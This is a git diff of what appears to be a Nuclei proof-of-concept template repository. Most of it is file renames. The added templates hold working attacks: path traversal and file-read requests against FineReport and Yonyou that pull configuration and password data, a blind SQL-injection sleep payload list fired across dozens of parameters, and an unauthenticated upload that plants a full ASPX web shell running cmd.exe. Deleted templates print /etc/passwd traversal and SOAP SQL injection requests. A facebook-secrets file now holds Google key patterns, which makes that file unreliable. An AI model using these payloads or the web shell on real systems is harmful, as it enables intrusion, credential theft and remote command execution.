b/poc/other/defectdojo-panel.yaml similarity index 100% rename from poc/other/defectdojo-panel-6916.yaml rename to poc/other/defectdojo-panel.yaml diff --git a/poc/other/diaowen-fileread.yaml b/poc/other/diaowen-fileread(1).yaml similarity index 100% rename from poc/other/diaowen-fileread.yaml rename to poc/other/diaowen-fileread(1).yaml diff --git a/poc/other/druid-monitor-7104.yaml b/poc/other/druid-monitor.yaml similarity index 100% rename from poc/other/druid-monitor-7104.yaml rename to poc/other/druid-monitor.yaml diff --git a/poc/other/dynamic-broadcast-receiver.yaml b/poc/other/dynamic-broadcast-receiver-7142.yaml similarity index 100% rename from poc/other/dynamic-broadcast-receiver.yaml rename to poc/other/dynamic-broadcast-receiver-7142.yaml diff --git a/poc/other/file-scheme-7467.yaml b/poc/other/file-scheme-7468.yaml similarity index 100% rename from poc/other/file-scheme-7467.yaml rename to poc/other/file-scheme-7468.yaml diff --git a/poc/other/fiorilaunchpad-logon-7482.yaml b/poc/other/fiorilaunchpad-logon.yaml similarity index 100% rename from poc/other/fiorilaunchpad-logon-7482.yaml rename to poc/other/fiorilaunchpad-logon.yaml diff --git a/poc/other/frserver-listdir.yaml b/poc/other/frserver-listdir.yaml new file mode 100644 index 0000000000..31d926f535 --- /dev/null +++ b/poc/other/frserver-listdir.yaml @@ -0,0 +1,25 @@ +id: frServer-listDir + +info: + name: 帆软目录遍历漏洞 + author: Str1am + severity: high + tags: frServer,listDir + +requests: + - method: GET + path: + - "{{BaseURL}}/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + - "{{BaseURL}}/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + - "{{BaseURL}}/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..¤tUserName=admin¤tUserId=1&isWebReport=true" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "isDir" + - "envPath" + part: body + condition: and \ No newline at end of file diff --git a/poc/other/raw-get.yaml b/poc/other/get-override-sni.yaml similarity index 100% rename from poc/other/raw-get.yaml rename to poc/other/get-override-sni.yaml diff --git a/poc/other/golang-metrics.yaml b/poc/other/golang-metrics-7765.yaml similarity index 100% rename from poc/other/golang-metrics.yaml rename to poc/other/golang-metrics-7765.yaml diff --git a/poc/other/hitron-technologies-7959.yaml b/poc/other/hitron-technologies.yaml similarity index 100% rename from poc/other/hitron-technologies-7959.yaml rename to poc/other/hitron-technologies.yaml diff --git a/poc/other/hmc-hybris-panel.yaml b/poc/other/hmc-hybris-panel-7978.yaml similarity index 100% rename from poc/other/hmc-hybris-panel.yaml rename to poc/other/hmc-hybris-panel-7978.yaml diff --git a/poc/other/hst-fileRead.yaml b/poc/other/hst-fileread.yaml similarity index 100% rename from poc/other/hst-fileRead.yaml rename to poc/other/hst-fileread.yaml diff --git a/poc/other/huawei-home-gateway-8072.yaml b/poc/other/huawei-home-gateway.yaml similarity index 100% rename from poc/other/huawei-home-gateway-8072.yaml rename to poc/other/huawei-home-gateway.yaml diff --git a/poc/other/iis.yaml b/poc/other/iis-shortname-8151.yaml similarity index 100% rename from poc/other/iis.yaml rename to poc/other/iis-shortname-8151.yaml diff --git a/poc/other/interlib-fileread.yaml b/poc/other/interlib-fileread-8174.yaml similarity index 100% rename from poc/other/interlib-fileread.yaml rename to poc/other/interlib-fileread-8174.yaml diff --git a/poc/other/landray-oa-fileread-8571.yaml b/poc/other/landray-oa-fileread.yaml similarity index 100% rename from poc/other/landray-oa-fileread-8571.yaml rename to poc/other/landray-oa-fileread.yaml diff --git a/poc/other/mobileiron.yaml b/poc/other/mobileiron(1).yaml similarity index 100% rename from poc/other/mobileiron.yaml rename to poc/other/mobileiron(1).yaml diff --git a/poc/other/open-proxy-localhost-9293.yaml b/poc/other/open-proxy-localhost.yaml similarity index 100% rename from poc/other/open-proxy-localhost-9293.yaml rename to poc/other/open-proxy-localhost.yaml diff --git a/poc/other/opensis-workflow-9318.yaml b/poc/other/opensis-workflow.yaml similarity index 100% rename from poc/other/opensis-workflow-9318.yaml rename to poc/other/opensis-workflow.yaml diff --git a/poc/other/otobo-panel.yaml b/poc/other/otobo-panel-9412.yaml similarity index 100% rename from poc/other/otobo-panel.yaml rename to poc/other/otobo-panel-9412.yaml diff --git a/poc/other/phoronix-pane;.yaml b/poc/other/phoronix-panel.yaml similarity index 100% rename from poc/other/phoronix-pane;.yaml rename to poc/other/phoronix-panel.yaml diff --git a/poc/other/ptr.yaml b/poc/other/ptr.yaml new file mode 100644 index 0000000000..6abf192f59 --- /dev/null +++ b/poc/other/ptr.yaml @@ -0,0 +1,27 @@ +id: ptr-fingerprint + +info: + name: PTR Detected + author: pdteam + severity: info + description: A PTR record was detected. A PTR record refers to the domain name. + classification: + cwe-id: CWE-200 + tags: dns,ptr + +dns: + - name: "{{FQDN}}" + type: PTR + + matchers: + - type: word + words: + - "IN\tPTR" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tPTR\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/poc/other/race-multiple.yaml b/poc/other/race-simple.yaml similarity index 100% rename from poc/other/race-multiple.yaml rename to poc/other/race-simple.yaml diff --git a/poc/other/ruijie-eg-filedown.yaml b/poc/other/ruijie-eg-filedown.yaml deleted file mode 100644 index 56c714fcaa..0000000000 --- a/poc/other/ruijie-eg-filedown.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ruijie-EG-fileDownload - -info: - name: 锐捷EG文件读取 - author: str1am - severity: high - tags: ruijie - -requests: - - method: GET - path: - - "{{BaseURL}}/download.php?a=read_txt&file=../../../../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "data" - - "status" - - "root" - part: body - condition: and diff --git a/poc/other/Ruijie-EG-passLeak.yaml b/poc/other/ruijie-eg-passleak.yaml similarity index 100% rename from poc/other/Ruijie-EG-passLeak.yaml rename to poc/other/ruijie-eg-passleak.yaml diff --git a/poc/other/sitecore-workflow-10293.yaml b/poc/other/sitecore-workflow.yaml similarity index 100% rename from poc/other/sitecore-workflow-10293.yaml rename to poc/other/sitecore-workflow.yaml diff --git a/poc/other/SiteCore.yaml b/poc/other/sitecore.yaml similarity index 100% rename from poc/other/SiteCore.yaml rename to poc/other/sitecore.yaml diff --git a/poc/other/sitemap.yaml b/poc/other/sitemap.yaml new file mode 100644 index 0000000000..28a441a26e --- /dev/null +++ b/poc/other/sitemap.yaml @@ -0,0 +1,39 @@ +id: sitemap-detect + +info: + name: Sitemap Detection + author: houdinis + severity: info + description: | + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + metadata: + verified: true + max-request: 3 + google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd + tags: miscellaneous,misc,generic,sitemap + +http: + - method: GET + path: + - "{{BaseURL}}/sitemap.xml" + - "{{BaseURL}}/sitemap.xsl" + - "{{BaseURL}}/sitemap.xsd" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - "sitemap>" + case-insensitive: true + + - type: word + part: header + words: + - 'application/xml' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100a3886dc74b36d5afa342e5daacaafa7c5d23111e4b867609a22228c4893916b5022100a5406e5dbb7748c7df6eb13b48988cd0c6adfbed1834b68c6257e32754cc1a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/tabnabbing-check.yaml b/poc/other/tabnabbing-check-10646.yaml similarity index 100% rename from poc/other/tabnabbing-check.yaml rename to poc/other/tabnabbing-check-10646.yaml diff --git a/poc/other/terraform-enterprise-panel-10712.yaml b/poc/other/terraform-enterprise-panel.yaml similarity index 100% rename from poc/other/terraform-enterprise-panel-10712.yaml rename to poc/other/terraform-enterprise-panel.yaml diff --git a/poc/other/thinkcmf_include.yaml b/poc/other/yongyou-eltextfile.yaml similarity index 55% rename from poc/other/thinkcmf_include.yaml rename to poc/other/yongyou-eltextfile.yaml index 9148b7cf26..20e4fa4652 100644 --- a/poc/other/thinkcmf_include.yaml +++ b/poc/other/yongyou-eltextfile.yaml @@ -1,15 +1,15 @@ -id: thinkCMF_include +id: yongyou-ELTextFile-FileRead info: - name: thinkCMF文件包含漏洞 + name: 用友文件读取 author: str1am severity: high - tags: pma + tags: yongyou requests: - method: GET path: - - "{{BaseURL}}/index.php?a=display&templateFile=README.md" + - "{{BaseURL}}/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml" matchers-condition: and matchers: - type: status @@ -17,6 +17,7 @@ requests: - 200 - type: word words: - - "官网:http://www.thinkcmf.com" + - "<enableHotDeploy>" + - "password" part: body condition: and diff --git a/poc/php/phppgadmin-panel-9539.yaml b/poc/php/phppgadmin-panel.yaml similarity index 100% rename from poc/php/phppgadmin-panel-9539.yaml rename to poc/php/phppgadmin-panel.yaml diff --git a/poc/python/default-django-page-6840.yaml b/poc/python/default-django-page.yaml similarity index 100% rename from poc/python/default-django-page-6840.yaml rename to poc/python/default-django-page.yaml diff --git a/poc/remote_code_execution/kingsoft-rce.yaml b/poc/remote_code_execution/Kingsoft-rce.yaml similarity index 100% rename from poc/remote_code_execution/kingsoft-rce.yaml rename to poc/remote_code_execution/Kingsoft-rce.yaml diff --git a/poc/remote_code_execution/seagate-media-rce.yaml b/poc/remote_code_execution/Seagate-media-rce.yaml similarity index 100% rename from poc/remote_code_execution/seagate-media-rce.yaml rename to poc/remote_code_execution/Seagate-media-rce.yaml diff --git a/poc/remote_code_execution/Apereo-Cas-rce.yaml b/poc/remote_code_execution/apereo-cas-rce.yaml similarity index 100% rename from poc/remote_code_execution/Apereo-Cas-rce.yaml rename to poc/remote_code_execution/apereo-cas-rce.yaml diff --git a/poc/remote_code_execution/forcepoint.yaml b/poc/remote_code_execution/forcepoint-7529.yaml similarity index 100% rename from poc/remote_code_execution/forcepoint.yaml rename to poc/remote_code_execution/forcepoint-7529.yaml diff --git a/poc/remote_code_execution/forcepoint-applicance.yaml b/poc/remote_code_execution/forcepoint-applicance-7527.yaml similarity index 100% rename from poc/remote_code_execution/forcepoint-applicance.yaml rename to poc/remote_code_execution/forcepoint-applicance-7527.yaml diff --git a/poc/remote_code_execution/icewarp-webclient-rce.yaml b/poc/remote_code_execution/icewarp-webclient-rce-8133.yaml similarity index 100% rename from poc/remote_code_execution/icewarp-webclient-rce.yaml rename to poc/remote_code_execution/icewarp-webclient-rce-8133.yaml diff --git a/poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml b/poc/remote_code_execution/jamf-log4j-jndi-rce.yaml similarity index 100% rename from poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml rename to poc/remote_code_execution/jamf-log4j-jndi-rce.yaml diff --git a/poc/remote_code_execution/lotuscms-rce.yaml b/poc/remote_code_execution/lotuscms-rce-8653.yaml similarity index 100% rename from poc/remote_code_execution/lotuscms-rce.yaml rename to poc/remote_code_execution/lotuscms-rce-8653.yaml diff --git a/poc/remote_code_execution/mcafee-epo-rce-8794.yaml b/poc/remote_code_execution/mcafee-epo-rce.yaml similarity index 100% rename from poc/remote_code_execution/mcafee-epo-rce-8794.yaml rename to poc/remote_code_execution/mcafee-epo-rce.yaml diff --git a/poc/remote_code_execution/sangfor-ba-rce.yaml b/poc/remote_code_execution/sangfor-ba-rce(1).yaml similarity index 100% rename from poc/remote_code_execution/sangfor-ba-rce.yaml rename to poc/remote_code_execution/sangfor-ba-rce(1).yaml diff --git a/poc/remote_code_execution/wangkang-ns-asg-rce-1.yaml b/poc/remote_code_execution/wangkang-NS-ASG-rce-1.yaml similarity index 100% rename from poc/remote_code_execution/wangkang-ns-asg-rce-1.yaml rename to poc/remote_code_execution/wangkang-NS-ASG-rce-1.yaml diff --git a/poc/remote_code_execution/wangkang-NGFW-rce.yaml b/poc/remote_code_execution/wangkang-ngfw-rce.yaml similarity index 100% rename from poc/remote_code_execution/wangkang-NGFW-rce.yaml rename to poc/remote_code_execution/wangkang-ngfw-rce.yaml diff --git a/poc/search/elasticsearch.yaml b/poc/search/elasticsearch-7195.yaml similarity index 100% rename from poc/search/elasticsearch.yaml rename to poc/search/elasticsearch-7195.yaml diff --git a/poc/sharepoint/exposed-sharepoint-list.yaml b/poc/sharepoint/exposed-sharepoint-list-7345.yaml similarity index 100% rename from poc/sharepoint/exposed-sharepoint-list.yaml rename to poc/sharepoint/exposed-sharepoint-list-7345.yaml diff --git a/poc/shopify/shopify-shared-secret-11862.yaml b/poc/shopify/shopify-shared-secret(1).yaml similarity index 100% rename from poc/shopify/shopify-shared-secret-11862.yaml rename to poc/shopify/shopify-shared-secret(1).yaml diff --git a/poc/shopify/shopify-token-11863.yaml b/poc/shopify/shopify-token(1).yaml similarity index 100% rename from poc/shopify/shopify-token-11863.yaml rename to poc/shopify/shopify-token(1).yaml diff --git a/poc/social/facebook-secret.yaml b/poc/social/facebook-secret-7386.yaml similarity index 100% rename from poc/social/facebook-secret.yaml rename to poc/social/facebook-secret-7386.yaml diff --git a/poc/google/google-secrets.yaml b/poc/social/facebook-secrets.yaml similarity index 52% rename from poc/google/google-secrets.yaml rename to poc/social/facebook-secrets.yaml index d9cb5cef3a..a689838b9d 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/social/facebook-secrets.yaml @@ -15,21 +15,21 @@ file: extractors: - type: regex - name: facebook-access-token + name: google-api-key regex: - - "EAACEdEose0cBA[0-9A-Za-z]+" + - "AIza[0-9A-Za-z\\\\-_]{35}" - type: regex - name: facebook-client-id + name: google-cloud-platform-api-key regex: - - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" + - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" - type: regex - name: facebook-oauth + name: google-oauth regex: - - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" + - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" - type: regex - name: facebook-secret-key + name: google-oauth-access-token regex: - - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" + - "ya29\\\\.[0-9A-Za-z\\\\-_]+" diff --git a/poc/social/linkedin-id-11853.yaml b/poc/social/linkedin-id.yaml similarity index 100% rename from poc/social/linkedin-id-11853.yaml rename to poc/social/linkedin-id.yaml diff --git a/poc/social/twitter-secret.yaml b/poc/social/twitter-secret(1).yaml similarity index 100% rename from poc/social/twitter-secret.yaml rename to poc/social/twitter-secret(1).yaml diff --git a/poc/sql/empirecms-rate-sqli.yaml b/poc/sql/EmpireCMS-rate-sqli.yaml similarity index 100% rename from poc/sql/empirecms-rate-sqli.yaml rename to poc/sql/EmpireCMS-rate-sqli.yaml diff --git a/poc/sql/maticsoft-shop-sqli.yaml b/poc/sql/Maticsoft-Shop-sqli.yaml similarity index 100% rename from poc/sql/maticsoft-shop-sqli.yaml rename to poc/sql/Maticsoft-Shop-sqli.yaml diff --git a/poc/sql/android-debug-database-exposed-312.yaml b/poc/sql/android-debug-database-exposed.yaml similarity index 100% rename from poc/sql/android-debug-database-exposed-312.yaml rename to poc/sql/android-debug-database-exposed.yaml diff --git a/poc/sql/bsqli.yaml b/poc/sql/bsqli.yaml new file mode 100644 index 0000000000..505fe5f213 --- /dev/null +++ b/poc/sql/bsqli.yaml @@ -0,0 +1,77 @@ +id: blind-based-sqli-sleep +info: + name: Blind based SQLi (sleep) + author: chirag-3rag + severity: critical + description: URL test for blind sleep payloads. + reference: + - https://github.com/AssassinUKG + tags: sqli,blind + +requests: + - method: GET + path: + - "{{BaseURL}}{{exts}}{{sleep_payload}}" + payloads: + sleep_payload: + # MySQL + - "(select*from(select(sleep(7)))a)" + - "%28select%2Afrom%28select%28sleep%287%29%29a%29" + - "1%20OR%20ELT%28%5B33%5D%3D%5B33%5D%2CSLEEP%28%5B7%5D%29%29" + - "1+AND+ELT%281337%3D1337%2CSLEEP%287%29%29" + # MSSQL + - ";waitfor delay '0:0:7'--" + - "%3Bwaitfor%20delay%20%270%3A0%3A7%27%2D%2D" + # Oracle + - "select%201%20from%20pg_sleep(7)" + - "%3B(select%201%20from%20pg_sleep(7))" + - "%7C%7C(select%201%20from%20pg_sleep(7))" + exts: + - "?pid=" + - "?s=" + - "?search_id=" + - "?cat=" + - "?id=" + - "?page=" + - "?dir=" + - "?search=" + - "?category=" + - "?file=" + - "?class=" + - "?url=" + - "?news=" + - "?item=" + - "?menu=" + - "?lang=" + - "?name=" + - "?ref=" + - "?title=" + - "?view=" + - "?topic=" + - "?thread=" + - "?type=" + - "?date=" + - "?form=" + - "?join=" + - "?main=" + - "?nav=" + - "?region=" + - "?filename=" + + attack: clusterbomb + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "duration>=7 && duration<=8" + - type: word + words: + - "Access Denied" + - "Error 1006" + - "Cloudflare" + - "403 Forbidden" + condition: or + part: body + negative: true diff --git a/poc/sql/buildbot-panel-802.yaml b/poc/sql/buildbot-panel.yml similarity index 100% rename from poc/sql/buildbot-panel-802.yaml rename to poc/sql/buildbot-panel.yml diff --git a/poc/sql/couchdb-adminparty.yml b/poc/sql/couchdb-adminparty-1234.yaml similarity index 100% rename from poc/sql/couchdb-adminparty.yml rename to poc/sql/couchdb-adminparty-1234.yaml diff --git a/poc/sql/exposed-mysql-initial-7322.yaml b/poc/sql/exposed-mysql-initial.yaml similarity index 100% rename from poc/sql/exposed-mysql-initial-7322.yaml rename to poc/sql/exposed-mysql-initial.yaml diff --git a/poc/sql/kevinlab-bems-sqli.yaml b/poc/sql/kevinlab-bems-sqli-8460.yaml similarity index 100% rename from poc/sql/kevinlab-bems-sqli.yaml rename to poc/sql/kevinlab-bems-sqli-8460.yaml diff --git a/poc/sql/Kingdee-sqli.yaml b/poc/sql/kingdee-sqli.yaml similarity index 100% rename from poc/sql/Kingdee-sqli.yaml rename to poc/sql/kingdee-sqli.yaml diff --git a/poc/sql/MagicFlow-sqli.yaml b/poc/sql/magicflow-sqli.yaml similarity index 100% rename from poc/sql/MagicFlow-sqli.yaml rename to poc/sql/magicflow-sqli.yaml diff --git a/poc/sql/Netoray-sqli.yaml b/poc/sql/netoray-sqli.yaml similarity index 100% rename from poc/sql/Netoray-sqli.yaml rename to poc/sql/netoray-sqli.yaml diff --git a/poc/sql/yongyou-icurrtype-sqli.yaml b/poc/sql/yongyou-icurrtype-sqli.yaml deleted file mode 100644 index 5c7bbbc0af..0000000000 --- a/poc/sql/yongyou-icurrtype-sqli.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: yongyou-jdbcRead - -info: - name: yongyou配置文件读取 - author: Str1am - severity: high - tags: yongyou - -requests: - - raw: - - | - POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - X-Forwarded-For: 8.8.8.8 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Type: application/x-www-form-urlencoded - Content-Length: 667 - - <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:exportCurrtypeToCrm> <string>1'</string> </urn:exportCurrtypeToCrm> </SOAP-ENV:Body></SOAP-ENV:Envelope> - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - words: - - "ORA-01756" - part: body - condition: and \ No newline at end of file diff --git a/poc/sql_injection/empirecms-rate-sqli.yaml b/poc/sql_injection/EmpireCMS-rate-sqli.yaml similarity index 100% rename from poc/sql_injection/empirecms-rate-sqli.yaml rename to poc/sql_injection/EmpireCMS-rate-sqli.yaml diff --git a/poc/sql_injection/maticsoft-shop-sqli.yaml b/poc/sql_injection/Maticsoft-Shop-sqli.yaml similarity index 100% rename from poc/sql_injection/maticsoft-shop-sqli.yaml rename to poc/sql_injection/Maticsoft-Shop-sqli.yaml diff --git a/poc/sql_injection/bsqli.yaml b/poc/sql_injection/bsqli.yaml new file mode 100644 index 0000000000..505fe5f213 --- /dev/null +++ b/poc/sql_injection/bsqli.yaml @@ -0,0 +1,77 @@ +id: blind-based-sqli-sleep +info: + name: Blind based SQLi (sleep) + author: chirag-3rag + severity: critical + description: URL test for blind sleep payloads. + reference: + - https://github.com/AssassinUKG + tags: sqli,blind + +requests: + - method: GET + path: + - "{{BaseURL}}{{exts}}{{sleep_payload}}" + payloads: + sleep_payload: + # MySQL + - "(select*from(select(sleep(7)))a)" + - "%28select%2Afrom%28select%28sleep%287%29%29a%29" + - "1%20OR%20ELT%28%5B33%5D%3D%5B33%5D%2CSLEEP%28%5B7%5D%29%29" + - "1+AND+ELT%281337%3D1337%2CSLEEP%287%29%29" + # MSSQL + - ";waitfor delay '0:0:7'--" + - "%3Bwaitfor%20delay%20%270%3A0%3A7%27%2D%2D" + # Oracle + - "select%201%20from%20pg_sleep(7)" + - "%3B(select%201%20from%20pg_sleep(7))" + - "%7C%7C(select%201%20from%20pg_sleep(7))" + exts: + - "?pid=" + - "?s=" + - "?search_id=" + - "?cat=" + - "?id=" + - "?page=" + - "?dir=" + - "?search=" + - "?category=" + - "?file=" + - "?class=" + - "?url=" + - "?news=" + - "?item=" + - "?menu=" + - "?lang=" + - "?name=" + - "?ref=" + - "?title=" + - "?view=" + - "?topic=" + - "?thread=" + - "?type=" + - "?date=" + - "?form=" + - "?join=" + - "?main=" + - "?nav=" + - "?region=" + - "?filename=" + + attack: clusterbomb + threads: 50 + stop-at-first-match: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "duration>=7 && duration<=8" + - type: word + words: + - "Access Denied" + - "Error 1006" + - "Cloudflare" + - "403 Forbidden" + condition: or + part: body + negative: true diff --git a/poc/sql_injection/kevinlab-bems-sqli.yaml b/poc/sql_injection/kevinlab-bems-sqli-8460.yaml similarity index 100% rename from poc/sql_injection/kevinlab-bems-sqli.yaml rename to poc/sql_injection/kevinlab-bems-sqli-8460.yaml diff --git a/poc/sql_injection/Kingdee-sqli.yaml b/poc/sql_injection/kingdee-sqli.yaml similarity index 100% rename from poc/sql_injection/Kingdee-sqli.yaml rename to poc/sql_injection/kingdee-sqli.yaml diff --git a/poc/sql_injection/MagicFlow-sqli.yaml b/poc/sql_injection/magicflow-sqli.yaml similarity index 100% rename from poc/sql_injection/MagicFlow-sqli.yaml rename to poc/sql_injection/magicflow-sqli.yaml diff --git a/poc/sql_injection/Netoray-sqli.yaml b/poc/sql_injection/netoray-sqli.yaml similarity index 100% rename from poc/sql_injection/Netoray-sqli.yaml rename to poc/sql_injection/netoray-sqli.yaml diff --git a/poc/sql_injection/yongyou-icurrtype-sqli.yaml b/poc/sql_injection/yongyou-icurrtype-sqli.yaml deleted file mode 100644 index 5c7bbbc0af..0000000000 --- a/poc/sql_injection/yongyou-icurrtype-sqli.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: yongyou-jdbcRead - -info: - name: yongyou配置文件读取 - author: Str1am - severity: high - tags: yongyou - -requests: - - raw: - - | - POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate - DNT: 1 - X-Forwarded-For: 8.8.8.8 - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Type: application/x-www-form-urlencoded - Content-Length: 667 - - <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:exportCurrtypeToCrm> <string>1'</string> </urn:exportCurrtypeToCrm> </SOAP-ENV:Body></SOAP-ENV:Envelope> - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - words: - - "ORA-01756" - part: body - condition: and \ No newline at end of file diff --git a/poc/ssrf/microstrategy-ssrf-8859.yaml b/poc/ssrf/microstrategy-ssrf.yml similarity index 100% rename from poc/ssrf/microstrategy-ssrf-8859.yaml rename to poc/ssrf/microstrategy-ssrf.yml diff --git a/poc/ssrf/SPON-IP-SSRF.yaml b/poc/ssrf/spon-ip-ssrf.yaml similarity index 100% rename from poc/ssrf/SPON-IP-SSRF.yaml rename to poc/ssrf/spon-ip-ssrf.yaml diff --git a/poc/upload/qihang-media-upload.yaml b/poc/upload/qihang-media-upload_all.yaml similarity index 57% rename from poc/upload/qihang-media-upload.yaml rename to poc/upload/qihang-media-upload_all.yaml index b2280afbb6..7dcc350b94 100644 --- a/poc/upload/qihang-media-upload.yaml +++ b/poc/upload/qihang-media-upload_all.yaml @@ -16,11 +16,10 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: qihang_all,upload,unauth,intrusive + tags: qihang,upload,unauth,intrusive variables: a1: "{{rand_base(6)}}" - a2: "{{randstr}}" http: - raw: - | @@ -37,7 +36,43 @@ http: Content-Disposition: form-data; name="fileToUpload"; filename="{{a1}}.aspx" Content-Type: application/octet-stream - <% response.write ("{{a2}}")%> + <%@ Page Language="VB" Debug="true" %> + <%@ import Namespace="system.IO" %> + <%@ import Namespace="System.Diagnostics" %> + + <script runat="server"> + + Sub RunCmd(Src As Object, E As EventArgs) + Dim myProcess As New Process() + Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) + myProcessStartInfo.UseShellExecute = false + myProcessStartInfo.RedirectStandardOutput = true + myProcess.StartInfo = myProcessStartInfo + myProcessStartInfo.Arguments=xcmd.text + myProcess.Start() + + Dim myStreamReader As StreamReader = myProcess.StandardOutput + Dim myString As String = myStreamReader.Readtoend() + myProcess.Close() + mystring=replace(mystring,"<","<") + mystring=replace(mystring,">",">") + result.text= vbcrlf & "<pre>" & mystring & "</pre>" + End Sub + + </script> + + <html> + <body> + <form runat="server"> + <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label> + <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox> + <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label> + <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c whoami&&ipconfig">/c whoami&&ipconfig</asp:TextBox> + <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button> + <p><asp:Label id="result" runat="server"></asp:Label> + </form> + </body> + </html> ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="action" @@ -56,10 +91,16 @@ http: Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 + matchers-condition: and matchers: - type: word words: - - "{{a2}}" + - "aspx" + part: body + + - type: word + words: + - "Program" part: body # digest: 4a0a00473045022100b0ccc2410095cc0b8643fecc56332837abe16e738090fb425ade88ff74dc8ee202202fb2a4c5e13026904c35c4e5b1714a655b8b1d0a2836099f26d0923adcbac7cc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/upload/ueditor-file-upload-10875.yaml b/poc/upload/ueditor-file-upload.yaml similarity index 100% rename from poc/upload/ueditor-file-upload-10875.yaml rename to poc/upload/ueditor-file-upload.yaml diff --git a/poc/upload/unauthenticated-popup-upload.yaml b/poc/upload/unauthenticated-popup-upload-10923.yaml similarity index 100% rename from poc/upload/unauthenticated-popup-upload.yaml rename to poc/upload/unauthenticated-popup-upload-10923.yaml diff --git a/poc/web/webtalk-leakage.yaml b/poc/web/Webtalk-leakage.yaml similarity index 100% rename from poc/web/webtalk-leakage.yaml rename to poc/web/Webtalk-leakage.yaml diff --git a/poc/web/artica-web-proxy-detect-545.yaml b/poc/web/artica-web-proxy-detect.yaml similarity index 100% rename from poc/web/artica-web-proxy-detect-545.yaml rename to poc/web/artica-web-proxy-detect.yaml diff --git a/poc/web/axigen-webadmin.yaml b/poc/web/axigen-webadmin-660.yaml similarity index 100% rename from poc/web/axigen-webadmin.yaml rename to poc/web/axigen-webadmin-660.yaml diff --git a/poc/web/fortiweb-panel.yaml b/poc/web/fortiweb-panel-7539.yaml similarity index 100% rename from poc/web/fortiweb-panel.yaml rename to poc/web/fortiweb-panel-7539.yaml diff --git 